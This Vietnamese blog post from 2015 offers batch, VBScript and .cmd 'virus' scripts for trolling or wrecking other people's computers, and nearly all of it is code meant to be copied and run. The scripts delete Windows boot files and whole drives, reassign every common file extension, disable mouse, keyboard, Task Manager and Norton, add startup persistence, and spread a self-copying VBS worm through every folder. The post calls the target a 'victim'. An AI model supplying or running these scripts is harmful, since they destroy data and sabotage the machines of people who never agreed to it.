Pages

Thứ Ba, 8 tháng 12, 2015

một số tiện ích của file .bat để troll người khác hoặc phá vui

Mình sẽ cho các bạn xem một số code của con virus đuôi .BAT:
1) virus phá hoại cửa sổ windown:
Code:
@echo off
msg *virus activated*
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg *Computer Over. Virus=Very Yes.*
shutdown -s -t 10 -c " "
2)loại virus này làm vô hiệu hóa chuột, bàn phím,task manager, thay đổi tập
tin:
code:
@echo off
prompt $P $G
assoc .doc = fA1luRe
assoc .docx = fA1luRe
assoc .log = fA1luRe
assoc .msg = fA1luRe
assoc .pages = fA1luRe
assoc .rtf = fA1luRe
assoc .txt = fA1luRe
assoc .wpd = fA1luRe
assoc .wps = fA1luRe
assoc .accdb = fA1luRe
assoc .blg = fA1luRe
assoc .csv = fA1luRe
assoc .dat = fA1luRe
assoc .db = fA1luReassoc .efx = fA1luRe
assoc .mdb = fA1luRe
assoc .pdb = fA1luRe
assoc .pps = fA1luRe
assoc .ppt = fA1luRe
assoc .pptx = fA1luRe
assoc .sdb = fA1luRe
assoc .sdf = fA1luRe
assoc .sql = fA1luRe
assoc .vcf = fA1luRe
assoc .wks = fA1luRe
assoc .xls = fA1luRe
assoc .xlsx = fA1luRe
assoc .xml = fA1luRe
assoc .bmp = fA1luRe
assoc .gif = fA1luRe
assoc .jpg = fA1luRe
assoc .png = fA1luRe
assoc .psd = fA1luRe
assoc .psp = fA1luRe
assoc .thm = fA1luRe
assoc .tif = fA1luRe
assoc .ai = fA1luRe
assoc .drw = fA1luRe
assoc .eps = fA1luRe
assoc .ps = fA1luRe
assoc .svg = fA1luRe
assoc .3dm = fA1luRe
assoc .dwg = fA1luRe
assoc .dxf = fA1luRe
assoc .pln = fA1luRe
assoc .indd = fA1luRe
assoc .pct = fA1luRe
assoc .pdf = fA1luRe
assoc .qxd = fA1luRe
assoc .qxp = fA1luReassoc .rels = fA1luRe
assoc .aac = fA1luRe
assoc .aif = fA1luRe
assoc .iff = fA1luRe
assoc .m3u = fA1luRe
assoc .mid = fA1luRe
assoc .mp3 = fA1luRe
assoc .mpa = fA1luRe
assoc .ra = fA1luRe
assoc .wav = fA1luRe
assoc .wma = fA1luRe
assoc .3g2 = fA1luRe
assoc .3gp = fA1luRe
assoc .asf = fA1luRe
assoc .asx = fA1luRe
assoc .avi = fA1luRe
assoc .flv = fA1luRe
assoc .mov = fA1luRe
assoc .mp4 = fA1luRe
assoc .mpg = fA1luRe
assoc .rm = fA1luRe
assoc .swf = fA1luRe
assoc .vob = fA1luRe
assoc .wmv = fA1luRe
assoc .asp = fA1luRe
assoc .cer = fA1luRe
assoc .csr = fA1luRe
assoc .css = fA1luRe
assoc .htm = fA1luRe
assoc .html = fA1luRe
assoc .js = fA1luRe
assoc .jsp = fA1luRe
assoc .php = fA1luRe
assoc .rss = fA1luRe
assoc .tvpi = fA1luRe
assoc .tvvi = fA1luReassoc .xhtml = fA1luRe
assoc .fnt = fA1luRe
assoc .fon = fA1luRe
assoc .otf = fA1luRe
assoc .ttf = fA1luRe
assoc .8bi = fA1luRe
assoc .plugin = fA1luRe
assoc .xll = fA1luRe
assoc .cab = fA1luRe
assoc .cpl = fA1luRe
assoc .cur = fA1luRe
assoc .dll = fA1luRe
assoc .dmp = fA1luRe
assoc .drv = fA1luRe
assoc .key = fA1luRe
assoc .lnk = fA1luRe
assoc .sys = fA1luRe
assoc .cfg = fA1luRe
assoc .ini = fA1luRe
assoc .keychain = fA1luRe
assoc .prf = fA1luRe
assoc .app = fA1luRe
assoc .bat = fA1luRe
assoc .cgi = fA1luRe
assoc .com = fA1luRe
assoc .exe = fA1luRe
assoc .pif = fA1luRe
assoc .vb = fA1luRe
assoc .ws = fA1luRe
assoc .7z = fA1luRe
assoc .deb = fA1luRe
assoc .gz = fA1luRe
assoc .pkg = fA1luRe
assoc .rar = fA1luRe
assoc .sit = fA1luRe
assoc .sitx = fA1luReassoc .tar.gz = fA1luRe
assoc .zip = fA1luRe
assoc .zipx = fA1luRe
assoc .bin = fA1luRe
assoc .hqx = fA1luRe
assoc .mim = fA1luRe
assoc .uue = fA1luRe
assoc .c = fA1luRe
assoc .cpp = fA1luRe
assoc .dtd = fA1luRe
assoc .java = fA1luRe
assoc .pl = fA1luRe
assoc .bak = fA1luRe
assoc .bup = fA1luRe
assoc .gho = fA1luRe
assoc .ori = fA1luRe
assoc .tmp = fA1luRe
assoc .dmg = fA1luRe
assoc .iso = fA1luRe
assoc .toast = fA1luRe
assoc .vcd = fA1luRe
assoc .gam = fA1luRe
assoc .nes = fA1luRe
assoc .rom = fA1luRe
assoc .sav = fA1luRe
assoc .dbx = fA1luRe
assoc .msi = fA1luRe
assoc .part = fA1luRe
assoc .torrent = fA1luRe
assoc .yps = fA1luRe
rundll32.exe mouse, disable
rundll32.exe keyboard, disable
copy setup.bat %userprofile%\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup
copy setup.bat %windir%\System32
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v fA1luRe /t REG_SZ /d %windir%\System32\setup.bat
taskkill /f /im taskmgr.exe
reg restore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie
s\System DisableTaskMgr = 1
shutdown -s -f -t 10 -c "PwN3D by fA1luRe!!!"
3)kiểm tra % của CPU lên đến bao nhiêu %:
bạn mở notepad ra và gõ start 1.bat vào trong rồi các bạn lưu con virus này là
1.bat rồi ngay lập tức % CPU sẽ tăng lên.
4)lặp lại nhiều lần chu kỳ mess:
Code:
@ECHO off
:Begin
msg * lời cảnh báo
msg * lời cảnh báo
msg * lời cảnh báo
msg * lời cảnh báo
msg * lời cảnh báo
GOTO BEGIN
VD:
@ECHO off
:Begin
msg * Hi
msg * khoe ko anh ?
msg * em ne ?
msg * buon ngu chua anh ?
msg * tat may ngu thoi ,bb anh
GOTO BEGIN
5)tự động tắt máy và kèm theo lời nhắn:
Code:
@echo off
msg * lời cảnh báo
shutdown -c “lời cảnh báo” -s
VD:@echo off
msg * I LOVE YOU
shutdown -c “Error! tam biet anh!” -s
Còn đây là một số con virus có đuôi là .VBS
1)Chức năng gửi thông điệp cảnh báo:
Code:
text1=msgbox("Thông điêp cảnh báo",42,"Tên thông điệp cảnh báo")
2)Chức năng làm đứng máy tính:
Code:
msgbox"Error !"
On Error Resume Next
Set vip_xinh = Createobject("scripting.filesystemobject")
vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "\
vip_xinh.vbs"
Set vip_xinh2= CreateObject("WScript.Shell")
vip_xinh2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru
n\die","wscript.exe "& vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs %"
On Error Resume Next
Const vic = "D:\"
Delvic
Sub Delvic()
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile vic & "*.*" , True
fso.DeleteFolder vic & "*" , True
End Sub
On Error Resume Next
Const vic1 = "C:\windows\"
Delvic1
Sub Delvic1()
Dim fso1
Set fso1 = CreateObject("Scripting.FileSystemObject")fso1.DeleteFile vic1 & "*.*" , True
fso1.DeleteFolder vic1 & "*" , True
End Sub
On Error Resume Next
Const vic2 = "C:\"
Delvic2
Sub Delvic2()
Dim fso2
Set fso2 = CreateObject("Scripting.FileSystemObject")
fso2.DeleteFile vic2 & "*.*" , True
fso2.DeleteFolder vic2 & "*" , True
End Sub
On Error Resume Next
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop
3)Đây là một con virus rất ác mình khuyên ban muốn thử nó thì hãy đóng
băng tất cả các ổ trước khi sử dụng nó không thì rước họa vào thân đấy bạn
Code:
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")
Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders
For Each f1 In sf
Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
COP.write VBCopy
Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
CAP.write VBCopy
FolderList(f1.Path)
Next
End sub
Còn đây là thuốc giải:
Code:
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fso.OpenTextFile(WScript.ScriptFullName,1)VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")
FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")
Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP,ATT
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders For Each f1 In sf
'Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
'COP.write VBCopy
'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
'CAP.write VBCopy'Set ATT=fso.GetFolder(f1.Path)
'ATT.Attributes=ATT.Attributes+2
fso.DeleteFile(f1.path & "\Virus !!!!!!!.vbs")
fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs")
FolderList(f1.Path)
Next
End sub
4)chức năng mở một thông điệp rồi sẽ tự động tắt máy:
Code:
@echo off
msg * thông điệp
shutdown -c "thông điệp" -s -t 10
5)không cho victim khởi động máy:
Code:
Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"
6)Disable NAV:
Code:
Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = " HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic
es\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"
7)hiển thị message mỗi khi restart máy:
Code:
dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = " HKLM\Software\Microsoft\Windows\CurrentVersion\Win
Logon\"
s2 = "LegalNoticeCaption"s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "lời cảnh báo"
wsh.RegWrite s1+s3, "lời cảnh báo"
8)chuc nang hien thi dong lenh khi ban click vao floder:
Code:
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","loi canh bao"
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\loi canh bao\","SLM"
vd:
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi ! Ban da bi nhiem WK
tu truongton.net"
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK
tu truongton.net\","SLM"
9)Xóa Registry Files:
Code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO slm loi canh bao.
GOTO MESSAGE
vd:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO slm chuc anh 1 ngay vui ve.
GOTO MESSAGE
10)Bật notepad lien tuc lam may tinh bi ngơ:
Code:@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
11)bật tắt caps lock liên tục:
Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
12)Ép enter liên tục:
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
ep Backspace lien tuc:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Còn đây là một số con virus có đuôi .cmd:
1)Xóa sạch tất cả các file có trong máy:
Code:
DEL /F /Q *
2)Xóa một file nào đó:
Code:
erase đường dẫnvd:
erase C:\TEST.txt
3)Ẩn tòan bộ file trong win
Code:

ATTRIB +S /F /Q *
Người đăng: vào lúc

Không có nhận xét nào:

Đăng nhận xét

Đăng ký: Đăng Nhận xét (Atom)
 

Người đóng góp cho blog

Blogger news

Blogroll

About